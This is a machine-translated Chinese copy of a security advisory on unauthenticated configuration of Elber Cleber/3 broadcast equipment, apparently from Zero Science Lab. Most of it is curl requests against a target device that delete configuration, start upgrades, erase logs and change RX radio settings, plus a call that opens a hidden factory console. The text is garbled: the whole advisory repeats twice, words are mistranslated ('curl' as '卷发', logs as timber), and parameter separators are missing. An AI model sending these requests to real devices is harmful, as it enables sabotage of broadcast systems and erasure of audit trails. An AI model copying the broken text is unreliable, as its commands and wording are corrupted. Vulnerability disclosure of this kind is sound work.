Elber Cleber/3广播多功能平台1.0.0设备配置
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 1.0.0修订7304
1.0.0修订7284
1.0.0修订6505
1.0.0修订6332
1.0.0修订6258
XS2DAB v1.50 Rev 6267
Summary: Cleber提供了强大,灵活和模块化的硬件,
用于广播和贡献网络的软件平台
客户最多可以安装六个板,而无需限制
位置或数字。基于Linux嵌入式OS,它检测到
董事会的存在并显示了相关的控制接口
用户,通过Web GUI和触摸屏TFT显示屏。电源
可以是单个(AC和/或DC)或双重(可用于冗余的热交换);
客户可以在两个范围之间选择DC来源,即22-65
或10-36 VDC用于站点或DSNG应用程序。
DESC:该设备患有未经验证的设备配置,并且
客户端隐藏功能披露。
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5817
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5817.php
18.08.2023
- -
#配置风扇
$ curl'http://target/json_data/fan?fan_speed=fan_target=warn_temp=alarm_temp='
应用配置
#删除配置
$ curl'http://target/json_data/conf_cmd?index=4cmd=2'
文件删除成功
#启动升级
$ curl'http://target/json_data/conf_cmd?index=4cmd=1'
升级成功启动
#日志擦除
$ curl'http://target/json_data/erase_log.js?直到=-2'
原木被删除
#直到:
#=0全部
#=-2昨天
#=-8上周
#=-15最近两个星期
#=-22最近三周
#=-31上个月
#设置Rx配置
$卷发'http://target/json_data/nbfmv2rx.setConfig?freq=2480000freq_offset=0mute=1sq_thresh=-90.0dec mode=0lr_swap=0preemph=0preemph_const=0deemph=0deemph_const=1CH_LR_ENABLE=0CH_R_GAIN=0.0CH l_gain=0.0CH_ADJ_CTRL=0CH_LR_ATT=1MPXDIG_ATT=0PILOT_TRIM=0.0MPXDIG_GAIN=0.0RDS_TRIM=0.0DEL ay_enable=0local_rds=0output_delay=0pi_code=0 _ mpx1_enable=1Mpx2_enable=1sca1_enable=1sca2_ enable=0MPX1_ATT=0MPX2_ATT=0SCA1_ATT=0SCA2_ATT=0MPX1_GAIN=0.0MPX2_GAIN=0.0SCA1_GAIN=0.0SCA2 _gain=0.0limiter_enable=falselim_1_gain=0.0+dblim_1_th=0.0+khzlim_1_alpha=0.0+%+%25setuptime=0 .0+msholdTime=0.0+msrelease -factor=0.0+db%2fSeclim_2_en=falselim_2_gain=0.0+dblim_2_th=0.0+k hzrds_gen=falsert_pi=rt_ps=rt_plus_en=falsert_line_a=rt_line_b=rt_af=rf_trap=0output_trap=0''
RX配置成功应用
#显示工厂窗口和FPGA上传(控制台)
cleber_show_factory_wnd()
# ETC。
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 1.0.0修订7304
1.0.0修订7284
1.0.0修订6505
1.0.0修订6332
1.0.0修订6258
XS2DAB v1.50 Rev 6267
Summary: Cleber提供了强大,灵活和模块化的硬件,
用于广播和贡献网络的软件平台
客户最多可以安装六个板,而无需限制
位置或数字。基于Linux嵌入式OS,它检测到
董事会的存在并显示了相关的控制接口
用户,通过Web GUI和触摸屏TFT显示屏。电源
可以是单个(AC和/或DC)或双重(可用于冗余的热交换);
客户可以在两个范围之间选择DC来源,即22-65
或10-36 VDC用于站点或DSNG应用程序。
DESC:该设备患有未经验证的设备配置,并且
客户端隐藏功能披露。
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5817
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5817.php
18.08.2023
- -
#配置风扇
$ curl'http://target/json_data/fan?fan_speed=fan_target=warn_temp=alarm_temp='
应用配置
#删除配置
$ curl'http://target/json_data/conf_cmd?index=4cmd=2'
文件删除成功
#启动升级
$ curl'http://target/json_data/conf_cmd?index=4cmd=1'
升级成功启动
#日志擦除
$ curl'http://target/json_data/erase_log.js?直到=-2'
原木被删除
#直到:
#=0全部
#=-2昨天
#=-8上周
#=-15最近两个星期
#=-22最近三周
#=-31上个月
#设置Rx配置
$卷发'http://target/json_data/nbfmv2rx.setConfig?freq=2480000freq_offset=0mute=1sq_thresh=-90.0dec mode=0lr_swap=0preemph=0preemph_const=0deemph=0deemph_const=1CH_LR_ENABLE=0CH_R_GAIN=0.0CH l_gain=0.0CH_ADJ_CTRL=0CH_LR_ATT=1MPXDIG_ATT=0PILOT_TRIM=0.0MPXDIG_GAIN=0.0RDS_TRIM=0.0DEL ay_enable=0local_rds=0output_delay=0pi_code=0 _ mpx1_enable=1Mpx2_enable=1sca1_enable=1sca2_ enable=0MPX1_ATT=0MPX2_ATT=0SCA1_ATT=0SCA2_ATT=0MPX1_GAIN=0.0MPX2_GAIN=0.0SCA1_GAIN=0.0SCA2 _gain=0.0limiter_enable=falselim_1_gain=0.0+dblim_1_th=0.0+khzlim_1_alpha=0.0+%+%25setuptime=0 .0+msholdTime=0.0+msrelease -factor=0.0+db%2fSeclim_2_en=falselim_2_gain=0.0+dblim_2_th=0.0+k hzrds_gen=falsert_pi=rt_ps=rt_plus_en=falsert_line_a=rt_line_b=rt_af=rf_trap=0output_trap=0''
RX配置成功应用
#显示工厂窗口和FPGA上传(控制台)
cleber_show_factory_wnd()
# ETC。